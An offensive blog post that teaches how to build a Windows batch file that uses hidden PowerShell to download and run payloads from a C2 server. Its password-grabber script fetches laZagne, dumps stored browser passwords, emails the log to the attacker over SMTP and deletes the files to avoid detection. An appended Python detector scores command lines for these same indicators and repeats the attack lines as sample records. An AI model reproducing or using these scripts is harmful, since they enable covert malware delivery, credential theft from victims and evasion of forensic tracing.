Powershell – Download and execute (payload, password grabber, keylogger, etc.)

In this post I will describe how you can create an executable batch file (.bat) which will download and execute, via PowerShell, any file you define. I usually use this technique to create malware which combines multiple attacks at once. For example, you can create a file which will download and execute a payload, and at the same time download and execute a keylogger, a password grabber, etc. There are limitless options. The only limit is your imagination.

Here is an example of a batch file which will download a malicious file from the path you define. Usually I put those files on a C2 server. After the download the file is saved to the defined path and executed. In this case I download it to the temp folder.

powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://PATH_TO_FILE/example.bat','%TEMP%\example.bat'); Start-Process "%TEMP%\example.bat"

If you want to download and execute more files at once, just add the same line from above on a new line in the same batch file; of course you need to change the file name.

In the rest of the post I will explain how you can download a file, execute it, set up a mail client, grab passwords, write them to a file, send that file by email and afterwards delete all traces. For this purpose I will use the case of a password grabber. Usually I create a separate grabber batch file and use it in the example above.

@echo off
set downloadURL=http://PATH TO/laZagne_x64.exe
set email= EMAIL ADDRESS
set password= PASSWORD
set exeFile=%TEMP%\proc.exe
set logFile=%TEMP%\proclog.txt
set arguments=all
powershell (new-object System.Net.WebClient).DownloadFile('%downloadURL%','%exeFile%');
%exeFile% %arguments% > %logFile%
del %exeFile%
powershell $SMTPServer = 'smtp.gmail.com';$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);$SMTPInfo.EnableSsl = $true;$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('%email%', '%password%');$ReportEmail = New-Object System.Net.Mail.MailMessage;$ReportEmail.From = '%email%';$ReportEmail.To.Add('%email%');$ReportEmail.Subject = 'Lazagne Report';$ReportEmail.Body = 'Lazagne report in the attachments.';$ReportEmail.Attachments.Add('%logFile%');$SMTPInfo.Send($ReportEmail);
del %logFile%

Explanation: first we set some variables: the download URL, the email address and password, and the name and location of the executable and of the log file. Next, PowerShell downloads the password grabber, the script executes it and redirects its output into the log file. Then the executable is deleted to hide traces. After that the mail client is set up, which sends the log file with all the passwords grabbed from the browser to your email address. Finally, the log file is deleted as well.

Note: to use a Gmail address you need to enable "less secure apps" access on your account.

So, we also learned how to delete all the files you downloaded and created. This is a smart move which every attacker should use, because afterwards it would not be possible to detect and trace the attack.
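The defender's counterpart to the two scripts above, added here as an example and not part of the original post: a small Python triage that scores command-line records for the same indicators (WebClient download cradle, hidden window, execute-from-%TEMP%, SmtpClient with an attachment, credentials embedded in the command line, cleanup deletes). The record format, the weights, the threshold and the sample records are constructed assumptions for this example.

```python
import re

# Indicators for the download-and-execute / grab-and-mail chain described above.
# Entries are (name, regex, weight); the weights are a triage heuristic chosen
# for this example, not an established scoring standard.
INDICATORS = [
    ("download_cradle", re.compile(r"net\.webclient.*downloadfile\(", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("exec_after_download", re.compile(r"downloadfile\(.*;\s*start-process", re.I), 3),
    ("exec_from_temp", re.compile(r"%temp%\\[^\s\"']+\.(?:exe|bat|cmd|ps1)", re.I), 2),
    ("smtp_exfil", re.compile(r"net\.mail\.smtpclient.*attachments\.add", re.I), 3),
    ("plaintext_creds", re.compile(r"net\.networkcredential\(", re.I), 2),
    ("cleanup_delete", re.compile(r"\bdel\s+%temp%\\", re.I), 1),
]

def score_commandline(cmd):
    """Return (total weight, [matched indicator names]) for one command line."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(cmd)]
    return sum(w for _, w in hits), [name for name, _ in hits]

def triage(records, threshold=4):
    """Flag records whose indicator weight meets the threshold.
    Each record is 'user|parent_image|commandline' (constructed format)."""
    flagged = []
    for rec in records:
        user, parent, cmd = rec.split("|", 2)
        score, hits = score_commandline(cmd)
        if score >= threshold:
            flagged.append({"user": user, "parent": parent, "score": score, "hits": hits})
    return flagged

# Constructed sample records (RFC 5737 test address, placeholder names); not real telemetry.
SAMPLE_RECORDS = [
    "alice|cmd.exe|powershell -windowstyle hidden (New-Object System.Net.WebClient)"
    ".DownloadFile('http://203.0.113.5/example.bat','%TEMP%\\example.bat'); "
    "Start-Process \"%TEMP%\\example.bat\"",
    "bob|explorer.exe|powershell -NoProfile -Command Get-ChildItem C:\\Users\\bob\\Documents",
    "alice|cmd.exe|powershell $SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.example.com', 587);"
    "$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@example.com', 'REDACTED');"
    "$ReportEmail = New-Object System.Net.Mail.MailMessage;"
    "$ReportEmail.Attachments.Add('%TEMP%\\proclog.txt');$SMTPInfo.Send($ReportEmail)",
    "alice|cmd.exe|del %TEMP%\\proc.exe",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_RECORDS):
        print(f"{hit['user']:6} {hit['parent']:12} score={hit['score']:2} {','.join(hit['hits'])}")
```

A single low-weight match (the `del` line alone) stays below the threshold; the chain is flagged because the cradle, hidden window and execute-from-%TEMP% co-occur in one command line.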
